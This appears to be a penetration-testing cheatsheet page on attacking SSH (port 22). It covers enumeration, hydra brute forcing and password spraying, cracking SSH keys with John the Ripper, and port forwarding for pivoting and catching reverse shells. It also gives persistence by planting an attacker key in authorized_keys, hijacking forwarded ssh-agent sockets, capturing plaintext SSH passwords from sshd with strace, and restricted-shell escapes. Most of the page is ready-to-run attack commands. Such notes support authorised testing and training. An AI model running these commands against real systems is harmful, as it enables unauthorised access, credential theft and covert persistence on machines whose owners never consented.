> For the complete documentation index, see [llms.txt](https://tamagosecurity.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://tamagosecurity.gitbook.io/notes/linux/22-ssh.md).

# 22 - SSH

## SSH Pentesting Cheatsheet

Secure Shell (SSH) is a ubiquitous protocol operating on Port 22/TCP. As a penetration tester, SSH is frequently used for initial access (via weak credentials or keys), pivoting, and persistence.

### 1. Enumeration

#### Banner Grabbing & Basic Nmap

Identify the SSH version and underlying OS.

```bash
nmap -sV -p 22 <IP>
nc -nv <IP> 22
```

#### Nmap SSH Scripts

Run all SSH-related Nmap scripts.

```bash
nmap -p 22 --script "ssh-*" <IP>
```

#### Supported Algorithms & Ciphers

Useful for identifying weak ciphers or legacy configurations.

```bash
nmap -p 22 --script ssh2-enum-algos <IP>
ssh -v <IP>
```

***

### 2. Authentication & Brute Forcing

#### Hydra (Password Brute Force)

```bash
# Dictionary attack for a known user
hydra -l <username> -P /usr/share/wordlists/rockyou.txt ssh://<IP>

# Dictionary attack with lists for both users and passwords
hydra -L users.txt -P passwords.txt ssh://<IP> -t 4
```

#### NetExec / CrackMapExec

```bash
# Check single credential
nxc ssh <IP> -u username -p password

# Password spraying
nxc ssh <IP> -u users.txt -p Password123! --continue-on-success
```

#### SSH Key Extraction / Weak Keys

Look for `.ssh` folders on compromised machines: `id_rsa`, `id_ed25519`. Check for the **Debian OpenSSL PRNG bug** (weak predictable keys):

* Use `ssh-vulnkey` or search exploit databases for Debian SSH key searchers.

Use John The Ripper to crack password-protected SSH keys:

```bash
ssh2john id_rsa > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

***

### 3. Port Forwarding & Tunnelling (Pivoting)

Connecting through compromised hosts to access internal networks.

#### Local Port Forwarding (`-L`)

Forward a local port to a remote IP/port through the SSH server. *(Syntax: `-L [Local Port]:[Destination IP]:[Destination Port]`)*

```bash
# Access an internal web server (10.10.10.5:80) via the compromised SSH host
ssh -L 8080:10.10.10.5:80 user@<SSH_SERVER_IP>
```

#### Remote Port Forwarding (`-R`)

Forward a port on the remote SSH server back to your local machine (Useful for reverse shells through firewalls). *(Syntax: `-R [Remote Port]:[Local IP]:[Local Port]`)*

```bash
# Catch a reverse shell originating from the internal network on the SSH server
ssh -R 4444:127.0.0.1:4444 user@<SSH_SERVER_IP>
```

#### Dynamic Port Forwarding (`-D`)

Creates a SOCKS proxy on your local machine, routing all traffic through the SSH server. Use with `proxychains`.

```bash
ssh -D 9050 user@<SSH_SERVER_IP>
```

*Configure `/etc/proxychains4.conf` to use `socks4 127.0.0.1 9050`, then run tools like `proxychains nmap ...`*

#### ProxyJump (`-J`)

Jump through an intermediary bastion host.

```bash
# Jump through Bastion to reach InternalHost
ssh -J user1@bastion_IP user2@internal_IP
```

***

### 4. Persistence

#### Adding an Authorized Key

Generate an SSH key pair on your attack box, and add the public key to the victim's `authorized_keys`.

```bash
# On Attacker Box:
ssh-keygen -t ed25519 -f my_attack_key

# On Compromised Victim (Append public key):
echo "ssh-ed25519 AAAAC3... attacker@kali" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
```

#### Stealing SSH-Agent (Hijacking SSH Sockets)

If an admin is logged into the box with `ssh-agent` forwarding enabled, you can hijack their socket to access other machines.

```bash
# Find the SSH auth socket
find /tmp -name "agent.*" -type s

# Set the environment variable
export SSH_AUTH_SOCK=/tmp/ssh-XXXXXX/agent.XXXX

# SSH into the next machine using the hijacked credentials
ssh root@target
```

***

### 5. Post-Exploitation

#### Sniffing SSH Passwords with `strace`

Attach to the SSH daemon to capture passwords in plaintext as users log in (requires root).

```bash
strace -f -p $(pgrep sshd | head -1) -e read,write -o ssh_trace.txt
# Later: grep for password or pam strings in the trace file
```

#### Escape Restricted Shells

If you login via SSH but are placed in an `rbash` (restricted bash):

```bash
ssh user@<IP> -t "/bin/sh"
ssh user@<IP> -t "bash --noprofile"
```

***

### 6. Notable Vulnerabilities

* **CVE-2018-15473 (SSH User Enumeration):** Older OpenSSH versions allow attackers to determine if a username exists via malformed authentication requests.
* **CVE-2024-6387 (regreSSHion):** Signal handler race condition in OpenSSH server allowing unauthenticated RCE (glibc-based Linux).
* **Misconfigurations:**
  * `PermitRootLogin yes` (Enables root brute-forcing/logins)
  * `PasswordAuthentication yes` (Should be disabled in favor of keys only)
